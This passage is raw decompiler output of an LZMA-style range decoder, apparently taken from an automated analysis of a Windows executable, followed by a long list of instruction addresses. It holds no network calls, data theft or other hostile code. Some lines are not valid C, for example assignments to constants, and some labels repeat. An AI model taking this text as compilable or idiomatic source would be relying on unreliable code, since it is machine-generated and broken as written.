												_t471 =  *(_t532 - 0x60) &  *(_t532 - 0x1c);
												 *(_t532 - 0x84) = 6;
												 *(_t532 - 0x4c) = _t471;
												_t525 =  *(_t532 - 4) + (( *(_t532 - 0x38) << 4) + _t471) * 2;
												goto L117;
											case 3:
												L21:
												__eflags =  *(_t532 - 0x6c);
												if( *(_t532 - 0x6c) == 0) {
													 *(_t532 - 0x88) = 3;
													goto L138;
												} else {
													 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
													_t67 = _t532 - 0x70;
													 *_t67 =  &(( *(_t532 - 0x70))[1]);
													__eflags =  *_t67;
													 *(_t532 - 0xc) =  *(_t532 - 0xc) << 0x00000008 |  *( *(_t532 - 0x70)) & 0x000000ff;
													L23:
													 *(_t532 - 0x48) =  *(_t532 - 0x48) - 1;
													if( *(_t532 - 0x48) != 0) {
														goto L21;
													} else {
														goto L24;
													}
												}
												goto L140;
											case 4:
												L118:
												_t449 =  *_t525;
												_t508 = _t449 & 0x0000ffff;
												_t484 = ( *(_t532 - 0x10) >> 0xb) * _t508;
												if( *(_t532 - 0xc) >= _t484) {
													 *(_t532 - 0x10) =  *(_t532 - 0x10) - _t484;
													 *(_t532 - 0xc) =  *(_t532 - 0xc) - _t484;
													 *(_t532 - 0x40) = 1;
													_t450 = _t449 - (_t449 >> 5);
													 *_t525 = _t450;
												} else {
													 *(_t532 - 0x10) = _t484;
													 *(_t532 - 0x40) =  *(_t532 - 0x40) & 0x00000000;
													 *_t525 = (0x800 - _t508 >> 5) + _t449;
												}
												goto L121;
											case 5:
												goto L122;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *((intOrPtr*)(__ebp - 0x84)) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													goto L117;
												} else {
													__eax =  *(__ebp - 0x5c) & 0x000000ff;
													__esi =  *(__ebp - 0x60);
													__cl = 8;
													__cl = 8 -  *(__ebp - 0x3c);
													__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
													__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
													__ecx =  *(__ebp - 0x3c);
													__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
													__ecx =  *(__ebp - 4);
													(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
													__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
													__eflags =  *(__ebp - 0x38) - 4;
													__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
													 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
													if( *(__ebp - 0x38) >= 4) {
														__eflags =  *(__ebp - 0x38) - 0xa;
														if( *(__ebp - 0x38) >= 0xa) {
															_t98 = __ebp - 0x38;
															 *_t98 =  *(__ebp - 0x38) - 6;
															__eflags =  *_t98;
														} else {
															 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
														}
													} else {
														 *(__ebp - 0x38) = 0;
													}
													__eflags =  *(__ebp - 0x34) - __edx;
													if( *(__ebp - 0x34) == __edx) {
														__ebx = 0;
														__ebx = 1;
														do {
															__eax =  *(__ebp - 0x58);
															__edx = __ebx + __ebx;
															__ecx =  *(__ebp - 0x10);
															__esi = __edx + __eax;
															__ecx =  *(__ebp - 0x10) >> 0xb;
															__ax =  *__esi;
															 *(__ebp - 0x54) = __esi;
															__edi = __ax & 0x0000ffff;
															__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
															__eflags =  *(__ebp - 0xc) - __ecx;
															if( *(__ebp - 0xc) >= __ecx) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
																 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
																__cx = __ax;
																_t217 = __edx + 1; // 0x1
																__ebx = _t217;
																__cx = __ax >> 5;
																__eflags = __eax;
																 *__esi = __ax;
															} else {
																 *(__ebp - 0x10) = __ecx;
																0x800 = 0x800 - __edi;
																0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
																__ebx = __ebx + __ebx;
																 *__esi = __cx;
															}
															__eflags =  *(__ebp - 0x10) - 0x1000000;
															 *(__ebp - 0x44) = __ebx;
															if( *(__ebp - 0x10) >= 0x1000000) {
																goto L59;
															} else {
																__eflags =  *(__ebp - 0x6c);
																if( *(__ebp - 0x6c) == 0) {
																	 *((intOrPtr*)(__ebp - 0x88)) = 0xf;
																	goto L138;
																} else {
																	__ecx =  *(__ebp - 0x70);
																	__eax =  *(__ebp - 0xc);
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
																	__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
																	 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
																	 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																	_t203 = __ebp - 0x70;
																	 *_t203 =  *(__ebp - 0x70) + 1;
																	__eflags =  *_t203;
																	 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																	goto L59;
																}
															}
															goto L140;
															L59:
															__eflags = __ebx - 0x100;
														} while (__ebx < 0x100);
														goto L55;
													} else {
														__eax =  *(__ebp - 0x14);
														__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
														__eflags = __eax -  *(__ebp - 0x74);
														if(__eax >=  *(__ebp - 0x74)) {
															__eax = __eax +  *(__ebp - 0x74);
															__eflags = __eax;
														}
														__ecx =  *(__ebp - 8);
														__ebx = 0;
														__ebx = 1;
														__al =  *((intOrPtr*)(__eax + __ecx));
														 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
														goto L41;
													}
												}
												goto L140;
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *((intOrPtr*)(__ebp - 0x80)) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L68;
												} else {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *((intOrPtr*)(__ebp - 0x84)) = 8;
													__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
													while(1) {
														L117:
														 *(_t532 - 0x54) = _t525;
														goto L118;
													}
												}
												while(1) {
													L117:
													 *(_t532 - 0x54) = _t525;
													goto L118;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *((intOrPtr*)(__ebp - 0x84)) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *((intOrPtr*)(__ebp - 0x84)) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *((intOrPtr*)(__ebp - 0x4c));
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *((intOrPtr*)(__ebp - 0x4c))) * 2;
												}
												while(1) {
													L117:
													 *(_t532 - 0x54) = _t525;
													goto L118;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L87;
												} else {
													__eflags =  *(__ebp - 0x60);
													if( *(__ebp - 0x60) == 0) {
														goto L139;
													} else {
														__eax = 0;
														__eflags =  *(__ebp - 0x38) - 7;
														0 |  *(__ebp - 0x38) - 0x00000007 >= 0x00000000 = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
														 *(__ebp - 0x38) = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
														__eflags =  *(__ebp - 0x64);
														if( *(__ebp - 0x64) == 0) {
															 *((intOrPtr*)(__ebp - 0x88)) = 0x1b;
															goto L138;
														} else {
															__eax =  *(__ebp - 0x14);
															__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
															__eflags = __eax -  *(__ebp - 0x74);
															if(__eax >=  *(__ebp - 0x74)) {
																__eax = __eax +  *(__ebp - 0x74);
																__eflags = __eax;
															}
															__edx =  *(__ebp - 8);
															__cl =  *(__eax + __edx);
															__eax =  *(__ebp - 0x14);
															 *(__ebp - 0x5c) = __cl;
															 *(__eax + __edx) = __cl;
															__eax = __eax + 1;
															__edx = 0;
															_t275 = __eax %  *(__ebp - 0x74);
															__eax = __eax /  *(__ebp - 0x74);
															__edx = _t275;
															__eax =  *(__ebp - 0x68);
															 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
															 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
															_t284 = __ebp - 0x64;
															 *_t284 =  *(__ebp - 0x64) - 1;
															__eflags =  *_t284;
															 *( *(__ebp - 0x68)) = __cl;
															goto L78;
														}
													}
												}
												goto L140;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L86;
											case 0xc:
												while(1) {
													L88:
													__eflags =  *(__ebp - 0x6c);
													if( *(__ebp - 0x6c) == 0) {
														break;
													}
													__ecx =  *(__ebp - 0x70);
													__eax =  *(__ebp - 0xc);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
													__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
													 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
													 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													_t315 = __ebp - 0x70;
													 *_t315 =  *(__ebp - 0x70) + 1;
													__eflags =  *_t315;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													__eax =  *(__ebp - 0x2c);
													while(1) {
														_t319 = __ebp - 0x48;
														 *_t319 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t319;
														__eflags =  *(__ebp - 0x48);
														if( *(__ebp - 0x48) <= 0) {
															break;
														}
														__ecx =  *(__ebp - 0xc);
														__ebx = __ebx + __ebx;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
														__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														 *(__ebp - 0x44) = __ebx;
														if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
															__ecx =  *(__ebp - 0x10);
															 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
															__ebx = __ebx | 0x00000001;
															__eflags = __ebx;
															 *(__ebp - 0x44) = __ebx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															continue;
														} else {
															goto L88;
														}
														goto L140;
													}
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													while(1) {
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															break;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L100:
															_t349 = __ebp - 0x48;
															 *_t349 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t349;
															continue;
														} else {
															__eflags =  *(__ebp - 0x6c);
															if( *(__ebp - 0x6c) == 0) {
																 *((intOrPtr*)(__ebp - 0x88)) = 0x10;
																goto L138;
															} else {
																__ecx =  *(__ebp - 0x70);
																__eax =  *(__ebp - 0xc);
																 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
																__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
																 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
																 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																_t346 = __ebp - 0x70;
																 *_t346 =  *(__ebp - 0x70) + 1;
																__eflags =  *_t346;
																 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																goto L100;
															}
														}
														goto L140;
													}
													_t372 = __ebp - 0x2c;
													 *_t372 =  *(__ebp - 0x2c) + __ebx;
													__eflags =  *_t372;
													_t374 = __ebp - 0x2c;
													 *_t374 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t374;
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L138;
													} else {
														__eflags = __eax -  *(__ebp - 0x60);
														if(__eax >  *(__ebp - 0x60)) {
															goto L139;
														} else {
															 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
															__eax =  *(__ebp - 0x30);
															_t381 = __ebp - 0x60;
															 *_t381 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
															__eflags =  *_t381;
															while(1) {
																__eflags =  *(__ebp - 0x64);
																if( *(__ebp - 0x64) == 0) {
																	break;
																}
																__eax =  *(__ebp - 0x14);
																__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
																__eflags = __eax -  *(__ebp - 0x74);
																if(__eax >=  *(__ebp - 0x74)) {
																	__eax = __eax +  *(__ebp - 0x74);
																	__eflags = __eax;
																}
																__edx =  *(__ebp - 8);
																__cl =  *(__eax + __edx);
																__eax =  *(__ebp - 0x14);
																 *(__ebp - 0x5c) = __cl;
																 *(__eax + __edx) = __cl;
																__eax = __eax + 1;
																__edx = 0;
																_t395 = __eax %  *(__ebp - 0x74);
																__eax = __eax /  *(__ebp - 0x74);
																__edx = _t395;
																__eax =  *(__ebp - 0x68);
																 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
																 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																__eflags =  *(__ebp - 0x30);
																 *( *(__ebp - 0x68)) = __cl;
																 *(__ebp - 0x14) = _t395;
																if( *(__ebp - 0x30) > 0) {
																	continue;
																} else {
																	goto L79;
																}
																goto L140;
															}
															 *((intOrPtr*)(__ebp - 0x88)) = 0x1c;
															goto L138;
														}
													}
													goto L140;
												}
												 *((intOrPtr*)(__ebp - 0x88)) = 0xc;
												goto L138;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *((intOrPtr*)(__ebp - 0x88)) = 0xd;
													goto L138;
												} else {
													__ecx =  *(__ebp - 0x70);
													__eax =  *(__ebp - 0xc);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
													__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
													 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
													 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													_t122 = __ebp - 0x70;
													 *_t122 =  *(__ebp - 0x70) + 1;
													__eflags =  *_t122;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													L39:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
														while(1) {
															__eflags = __ebx - 0x100;
															if(__ebx >= 0x100) {
																goto L54;
															}
															__eax =  *(__ebp - 0x58);
															__edx = __ebx + __ebx;
															__ecx =  *(__ebp - 0x10);
															__esi = __edx + __eax;
															__ecx =  *(__ebp - 0x10) >> 0xb;
															__ax =  *__esi;
															 *(__ebp - 0x54) = __esi;
															__edi = __ax & 0x0000ffff;
															__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
															__eflags =  *(__ebp - 0xc) - __ecx;
															if( *(__ebp - 0xc) >= __ecx) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
																 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
																__cx = __ax;
																_t170 = __edx + 1; // 0x1
																__ebx = _t170;
																__cx = __ax >> 5;
																__eflags = __eax;
																 *__esi = __ax;
															} else {
																 *(__ebp - 0x10) = __ecx;
																0x800 = 0x800 - __edi;
																0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
																__ebx = __ebx + __ebx;
																 *__esi = __cx;
															}
															__eflags =  *(__ebp - 0x10) - 0x1000000;
															 *(__ebp - 0x44) = __ebx;
															if( *(__ebp - 0x10) >= 0x1000000) {
																continue;
															} else {
																__eflags =  *(__ebp - 0x6c);
																if( *(__ebp - 0x6c) == 0) {
																	 *((intOrPtr*)(__ebp - 0x88)) = 0xe;
																	goto L138;
																} else {
																	__ecx =  *(__ebp - 0x70);
																	__eax =  *(__ebp - 0xc);
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
																	__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
																	 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
																	 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																	_t156 = __ebp - 0x70;
																	 *_t156 =  *(__ebp - 0x70) + 1;
																	__eflags =  *_t156;
																	 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																	continue;
																}
															}
															goto L140;
														}
														goto L54;
													} else {
														__eflags = __ebx - 0x100;
														if(__ebx >= 0x100) {
															L54:
															_t173 = __ebp - 0x34;
															 *_t173 =  *(__ebp - 0x34) & 0x00000000;
															__eflags =  *_t173;
															L55:
															__al =  *(__ebp - 0x44);
															 *(__ebp - 0x5c) =  *(__ebp - 0x44);
															__eflags =  *(__ebp - 0x64);
															if( *(__ebp - 0x64) == 0) {
																 *((intOrPtr*)(__ebp - 0x88)) = 0x1a;
																goto L138;
															} else {
																__ecx =  *(__ebp - 0x68);
																__al =  *(__ebp - 0x5c);
																__edx =  *(__ebp - 8);
																 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
																 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
																 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
																 *( *(__ebp - 0x68)) = __al;
																__ecx =  *(__ebp - 0x14);
																 *(__ecx +  *(__ebp - 8)) = __al;
																__eax = __ecx + 1;
																__edx = 0;
																_t192 = __eax %  *(__ebp - 0x74);
																__eax = __eax /  *(__ebp - 0x74);
																__edx = _t192;
																L78:
																 *(__ebp - 0x14) = __edx;
																L79:
																 *((intOrPtr*)(__ebp - 0x88)) = 2;
																goto L1;
															}
														} else {
															L41:
															__eax =  *(__ebp - 0x5b) & 0x000000ff;
															 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
															__ecx =  *(__ebp - 0x58);
															__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
															 *(__ebp - 0x48) = __eax;
															__eax = __eax + 1;
															__eax = __eax << 8;
															__eax = __eax + __ebx;
															__esi =  *(__ebp - 0x58) + __eax * 2;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
															__ax =  *__esi;
															 *(__ebp - 0x54) = __esi;
															__edx = __ax & 0x0000ffff;
															__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
															__eflags =  *(__ebp - 0xc) - __ecx;
															if( *(__ebp - 0xc) >= __ecx) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
																 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
																__cx = __ax;
																 *(__ebp - 0x40) = 1;
																__cx = __ax >> 5;
																__eflags = __eax;
																__ebx = __ebx + __ebx + 1;
																 *__esi = __ax;
															} else {
																 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
																 *(__ebp - 0x10) = __ecx;
																0x800 = 0x800 - __edx;
																0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
																__ebx = __ebx + __ebx;
																 *__esi = __cx;
															}
															__eflags =  *(__ebp - 0x10) - 0x1000000;
															 *(__ebp - 0x44) = __ebx;
															if( *(__ebp - 0x10) >= 0x1000000) {
																goto L39;
															} else {
																goto L37;
															}
														}
													}
												}
												goto L140;
										}
									}
									L139:
									_t453 = _t452 | 0xffffffff;
								} else {
									L122:
									if( *(_t532 - 0x6c) == 0) {
										 *(_t532 - 0x88) = 5;
										L138:
										_t487 = 0x22;
										memcpy( *(_t532 - 0x90), _t532 - 0x88, _t487 << 2);
										_t453 = 0;
									} else {
										 *(_t532 - 0x10) =  *(_t532 - 0x10) << 8;
										 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
										 *(_t532 - 0x70) =  &(( *(_t532 - 0x70))[1]);
										 *(_t532 - 0xc) =  *(_t532 - 0xc) << 0x00000008 |  *( *(_t532 - 0x70)) & 0x000000ff;
										goto L124;
									}
								}
								L140:
								return _t453;
							}
						}
					}
					L117:
					 *(_t532 - 0x54) = _t525;
					goto L118;
				}
			}

0x00000000
0x00406ae2
0x00406ae2
0x00406ae6
0x00406af3
0x00406afd
0x00406ae8
0x00406ae8
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2c
0x00406b2f
0x00406b36
0x00406b3b
0x00406a1c
0x00406a1f
0x00406d91
0x00406d91
0x00406d91
0x00406d94
0x00406d94
0x00406d94
0x00406d9a
0x00406da0
0x00406da6
0x00406dc0
0x00406dc3
0x00406dc9
0x00406dd4
0x00406dd6
0x00406da8
0x00406da8
0x00406db7
0x00406dbb
0x00406dbb
0x00406dd9
0x00406de0
0x00406e07
0x00406e07
0x00406e0d
0x004065a9
0x004065a9
0x004065a9
0x004065b2
0x00000000
0x00000000
0x004065b8
0x00000000
0x004065c3
0x00000000
0x004065c9
0x004065cc
0x004065cf
0x004065d2
0x004065d6
0x00000000
0x004065dc
0x004065dc
0x004065df
0x004065e1
0x004065e2
0x004065e5
0x004065e7
0x004065e8
0x004065ea
0x004065ed
0x004065f2
0x004065f7
0x00406600
0x00406613
0x00406616
0x00406622
0x0040664a
0x0040664c
0x0040664e
0x00406651
0x00406652
0x00406652
0x0040664e
0x0040665a
0x0040665e
0x00000000
0x00406624
0x00406628
0x0040662d
0x0040662d
0x00406636
0x0040663e
0x00406641
0x00000000
0x00406647
0x00406647
0x00000000
0x00406647
0x00406641
0x00406622
0x004065d6
0x00000000
0x00000000
0x00406664
0x00406664
0x00406668
0x00406f14
0x00000000
0x0040666e
0x00406671
0x00406681
0x00406684
0x00406687
0x00406687
0x00406687
0x0040668a
0x0040668e
0x00000000
0x00406690
0x00406690
0x00406696
0x004066c0
0x004066c6
0x004066cd
0x00000000
0x00406698
0x0040669c
0x0040669f
0x004066a4
0x004066a4
0x004066af
0x004066b7
0x004066ba
0x00000000
0x00000000
0x00000000
0x00000000
0x004066ba
0x00406696
0x0040668e
0x00000000
0x00000000
0x004066ff
0x00406705
0x00406708
0x00406715
0x0040671d
0x00000000
0x00000000
0x004066d4
0x004066d4
0x004066d8
0x00406f23
0x00000000
0x004066de
0x004066e4
0x004066ef
0x004066ef
0x004066ef
0x004066f2
0x004066f5
0x004066f8
0x004066fd
0x00000000
0x00000000
0x00000000
0x00000000
0x004066fd
0x00000000
0x00000000
0x00406d94
0x00406d94
0x00406d9a
0x00406da0
0x00406da6
0x00406dc0
0x00406dc3
0x00406dc9
0x00406dd4
0x00406dd6
0x00406da8
0x00406da8
0x00406db7
0x00406dbb
0x00406dbb
0x00000000
0x00000000
0x00000000
0x00000000
0x00406725
0x00406727
0x0040672a
0x0040679b
0x0040679e
0x004067a1
0x004067a8
0x004067b2
0x00000000
0x0040672c
0x0040672c
0x00406730
0x00406733
0x00406735
0x00406738
0x0040673b
0x0040673d
0x00406740
0x00406742
0x00406747
0x0040674a
0x0040674d
0x00406751
0x00406758
0x0040675b
0x00406762
0x00406766
0x0040676e
0x0040676e
0x0040676e
0x00406768
0x00406768
0x00406768
0x0040675d
0x0040675d
0x0040675d
0x00406772
0x00406775
0x00406793
0x00406795
0x00406968
0x00406968
0x0040696b
0x0040696e
0x00406971
0x00406974
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406983
0x00406986
0x0040699e
0x004069a1
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ae
0x004069b0
0x00406988
0x00406988
0x00406990
0x00406995
0x00406997
0x00406999
0x00406999
0x004069b3
0x004069ba
0x004069bd
0x00000000
0x004069bf
0x0040693b
0x0040693f
0x00406f47
0x00000000
0x00406945
0x00406945
0x00406948
0x0040694b
0x0040694f
0x00406952
0x00406958
0x0040695a
0x0040695a
0x0040695a
0x0040695d
0x00000000
0x0040695d
0x0040693f
0x00000000
0x00406960
0x00406960
0x00406960
0x00000000
0x00406777
0x00406777
0x0040677a
0x0040677d
0x00406780
0x00406782
0x00406782
0x00406782
0x00406785
0x00406788
0x0040678a
0x0040678b
0x0040678e
0x00000000
0x0040678e
0x00406775
0x00000000
0x00000000
0x004069c4
0x004069c8
0x004069e6
0x004069e9
0x004069f0
0x004069f3
0x004069f6
0x004069f9
0x004069fc
0x004069ff
0x00406a01
0x00406a08
0x00406a09
0x00406a0b
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a19
0x00000000
0x004069ca
0x004069ca
0x004069cd
0x004069d0
0x004069da
0x00406d91
0x00406d91
0x00406d91
0x00000000
0x00406d91
0x00406d91
0x00406d91
0x00406d91
0x00406d91
0x00000000
0x00406d91
0x00000000
0x00406a2e
0x00406a32
0x00406a55
0x00406a58
0x00406a5b
0x00406a65
0x00406a34
0x00406a34
0x00406a37
0x00406a3a
0x00406a3d
0x00406a4a
0x00406a4d
0x00406a4d
0x00406d91
0x00406d91
0x00406d91
0x00000000
